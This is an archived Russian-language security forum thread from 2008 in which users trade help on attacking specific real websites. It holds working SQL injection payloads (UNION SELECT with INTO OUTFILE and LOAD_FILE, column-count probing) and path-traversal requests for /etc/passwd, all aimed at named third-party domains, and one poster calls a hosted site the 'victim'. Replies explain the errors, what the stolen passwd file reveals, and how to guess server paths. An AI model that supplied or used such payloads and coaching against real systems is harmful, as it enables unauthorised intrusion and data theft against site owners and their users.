ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.09.2008, 18:52
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
при -1+union+select+'1'+into+outfile+'/var/111'/* выдает ошибку Can't create/write to file ......(Errcode: 13) читать файлы можна) это значит права выставлены на папку и нада найти подходящую папку для аплоада или тут чет другое?)
|
|
|
22.09.2008, 18:54
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
(Errcode: 13) - нет прав на запись, ищи другую папку...  |
|
|
|
22.09.2008, 19:36
|
|
Новичок
Регистрация: 12.04.2008
Сообщений: 7
Провел на форуме:
34995
Репутация:
6
|
|
Интересует такой вопрос:
Допустим что на сайте есть php уязвимость, для чего в ссылки вида
http://www.site.ru/index.php?file=
подставлять ../../../../../../../etc/passwd
Вот сделал такой запрос http://www.site.ru/index.php?file=../../../../../../../etc/passwd
и после такого запроса открывается файл passwd, какую информацию я могу получить из этого файла
|
|
|
|
22.09.2008, 19:41
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
из него можно узнать лоигны пользователей, пути к их домашним директориям и наличие у них действующего интерпретатора.
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
22.09.2008, 19:47
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://ru.wikipedia.org/wiki//etc/passwd
|
|
|
|
22.09.2008, 19:49
|
|
Новичок
Регистрация: 12.04.2008
Сообщений: 7
Провел на форуме:
34995
Репутация:
6
|
|
Ну вот например
http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd
Вот что от сюда можно извлеч?
Прост много почитал статей про php инъекции, но не всё усвоил
|
|
|
|
22.09.2008, 23:58
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 3
Провел на форуме:
5201
Репутация:
0
|
|
Сообщение от saynt2day
Жертва находится на Masterhost.
1) нашёл инъекцию, пытаюсь прочитать файл, например так:
http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,LOAD_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31
Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.
2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?
Сообщение от iddqd
1)Попробуй перевести запрос в Char()
2)Не всегда
1) в char мне кажется смысла переводить нет, т.к кавычки не фильтруются и запрос срабатывает.
2) тут мне было интересно, может быть кто уже знает наверняка, есть у пользователя MySQL хостинга masterhost по умолчанию права на доступ к файлам.
Сообщение от Spyder
saynt2day
select file_priv from mysql.user where username='user'
где user - имя пользователя от которого работает мускуль
узнать через функцию user()
к сожалению прав доступа к БД mysql у пользователя user() нет.
|
|
|
|
23.09.2008, 00:05
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
saynt2day, попробуй load_file('/etc/passwd') или зарегай там акк и посмотри какой полный путь будет у тебя и по аналогии подбери путь до жертвы.
|
|
|
|
23.09.2008, 00:16
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 3
Провел на форуме:
5201
Репутация:
0
|
|
На примере другого мастерхостовского сайта выяснил, как выглядят у них пути:
http://www.mobil-life.ru/phones/catalog/?cat=1&madeby=2%27
/home/u20726/mobil-life.ru/www/index.php
Но штука в том, что у нужного мне сайта несколько доменных имён, которые все ведут на один сайт.
Пытаюсь прописывать все эти домены в SITE_NAME:
/home/ACCOUNT/SITE_NAME/www/
и ничего...
|
|
|
|
23.09.2008, 05:26
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
Помогите раскрутить баг:
http://www.mymovie.in.ua/film_info.php?film_id=323
http://www.mymovie.in.ua/film_info.php?film_id=324-1
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/*
Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?874750){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
